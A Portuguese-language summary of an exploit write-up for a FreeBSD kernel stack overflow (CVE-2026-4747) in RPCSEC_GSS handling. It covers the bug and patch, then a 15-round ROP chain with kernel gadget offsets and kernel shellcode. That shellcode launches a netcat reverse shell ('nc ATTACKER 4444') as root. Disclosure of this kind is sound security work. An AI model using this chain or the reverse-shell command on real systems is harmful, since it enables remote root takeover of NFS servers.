Obtenção de shell root via RCE remota no kernel do FreeBSD (CVE-2026-4747)

• No módulo kgssapi.ko do FreeBSD, ocorre um estouro de buffer de pilha durante o processamento da autenticação RPCSEC_GSS, permitindo execução remota de código
• A função svc_rpc_gss_validate() copia dados de credenciais sem verificação de limites, sobrescrevendo até o endereço de retorno
• Um invasor pode usar um ticket Kerberos válido para injetar uma cadeia ROP no kernel por meio do caminho RPCSEC_GSS de um servidor NFS
• Por meio de um overflow em 15 etapas, 432 bytes de shellcode são gravados e executados na área BSS do kernel, criando uma reverse shell com privilégios de root
• Algumas versões do FreeBSD 13.5~15.0 são afetadas, e o patch adiciona a lógica de validação de oa_length

CVE-2026-4747 — Estouro de buffer de pilha em RPCSEC_GSS do kgssapi.ko no FreeBSD

• Uma vulnerabilidade de estouro de buffer de pilha que ocorre durante o processamento da autenticação RPCSEC_GSS no módulo kgssapi.ko do FreeBSD
• Ao reconstruir o cabeçalho RPC em um buffer de pilha de 128 bytes, a função svc_rpc_gss_validate() copia dados de credenciais sem verificação de limites para oa_length
• Credenciais que excedam os 96 bytes restantes após o cabeçalho fixo de 32 bytes sobrescrevem variáveis locais, registradores salvos e até o endereço de retorno
• As versões FreeBSD 13.5(<p11), 14.3(<p10), 14.4(<p1), 15.0(<p5) são afetadas
• No patch, foi adicionada uma condição para verificar antes da cópia se oa_length excede o tamanho do buffer

Estrutura do overflow e impacto

• A análise do prólogo da função mostra que o array rpchdr fica em [rbp-0xc0], e o ponto de início da cópia em [rbp-0xa0]
• Após 96 bytes, são sobrescritos em sequência RBX salvo, R12~R15, RBP e o endereço de retorno
• No ataque real, por causa do cabeçalho GSS e de um handle de contexto de 16 bytes, o endereço de retorno fica no 200º byte do corpo da credencial
• O código vulnerável só é alcançável pelo caminho de autenticação RPCSEC_GSS do servidor NFS
• O invasor precisa ser um usuário com ticket Kerberos válido e provocar o overflow na etapa de autenticação RPCSEC_GSS (procedimento DATA)

Configuração do ambiente de ataque

• VM alvo: FreeBSD 14.4-RELEASE amd64, servidor NFS ativado, kgssapi.ko carregado, KDC MIT Kerberos em execução
• Host do invasor: Linux, com o módulo Python3 gssapi e o cliente MIT Kerberos instalados, com acesso a NFS (2049/TCP) e KDC (88/TCP)
• A configuração é possível em diversos ambientes de hipervisor, como QEMU, VMware, VirtualBox e bhyve
• Na configuração do Kerberos, são obrigatórias as opções rdns=false e dns_canonicalize_hostname=false em krb5.conf
• O hostname (test) e o service principal (nfs/test@TEST.LOCAL) devem coincidir entre a VM e o invasor

Estrutura do exploit de execução remota de código no kernel (RCE)

• O ataque é composto por 15 rodadas de overflow em múltiplas etapas
  1. Em cada rodada, é criado um novo contexto Kerberos GSS
  2. É enviado um pacote RPCSEC_GSS DATA acima do tamanho esperado
  3. O endereço de retorno é sobrescrito com um gadget ROP para gravar dados na memória do kernel ou executar shellcode
  4. kthread_exit() é chamado para encerrar normalmente a thread NFS
• Cada rodada usa cerca de 200 bytes de cadeia ROP e um total de 432 bytes de shellcode é enviado ao longo de 15 execuções
• Como o FreeBSD cria 8 threads NFS por CPU, são necessárias no mínimo 2 CPUs (16 threads)

Composição da cadeia ROP

• Principais gadgets ROP:
  • pop rdi; ret (K+0x1adcda)
  • pop rsi; ret (K+0x1cdf98)
  • pop rdx; ret (K+0x5fa429)
  • pop rax; ret (K+0x400cb4)
  • mov [rdi], rax; ret (0xffffffff80e3457c) — gravação arbitrária de 8 bytes na memória do kernel
• Rodada 1: chamada de pmap_change_prot() para alterar a área BSS do kernel para RWX
• Rodadas 2–14: uso do gadget mov [rdi], rax para gravar o shellcode na BSS em blocos de 32 bytes
• Rodada 15: grava os 16 bytes finais e salta para o ponto de entrada do shellcode

Funcionamento do shellcode

• É executado em modo kernel (CPL 0) e cria um processo de reverse shell com privilégios de root
• Como não é possível chamar execve() diretamente a partir de uma thread NFS do kernel, é usada uma estrutura em 2 etapas
  • Função Entry: cria um novo processo de kernel com kproc_create() e depois encerra
  • Função Worker: executa /bin/sh -c "mkfifo /tmp/f;sh</tmp/f|nc ATTACKER 4444>/tmp/f"
• O registrador DR7 é inicializado para evitar exceções de depuração
• O sinalizador P_KPROC é desativado para que fork_exit() siga pelo caminho userret em vez de kthread_exit()
• Como resultado, /bin/sh é executado em modo usuário com privilégios uid 0 (root)

Principais desafios resolvidos

• Incompatibilidade de offset de registrador: o offset real de RIP foi confirmado como 200 bytes com um padrão De Bruijn
• Incompatibilidade GSS MIT–Heimdal: o problema de normalização de hostname foi resolvido com a configuração de krb5.conf
• Herança de registradores de depuração: a inicialização de DR7 evita a exceção trap 1
• Limite de 400 bytes: a combinação pop rdi + pop rax + mov [rdi], rax permitiu envio estável em unidades de 8 bytes
• Consumo de threads NFS: cada rodada encerra 1 thread → são necessárias no mínimo 2 CPUs

Resumo do fluxo final do exploit

• Após obter um ticket Kerberos, o invasor envia em sequência 15 pacotes de overflow RPCSEC_GSS
• Rodada 1: define a BSS como RWX
• Rodadas 2–14: gravam 416 bytes do shellcode
• Rodada 15: grava os 16 bytes finais e executa o shellcode
• O shellcode cria um novo processo com kproc_create() e executa /bin/sh
• O invasor obtém uma shell root por meio de uma sessão nc
• Todo o processo leva cerca de 45 segundos e é concluído com um total de 15 pacotes RPC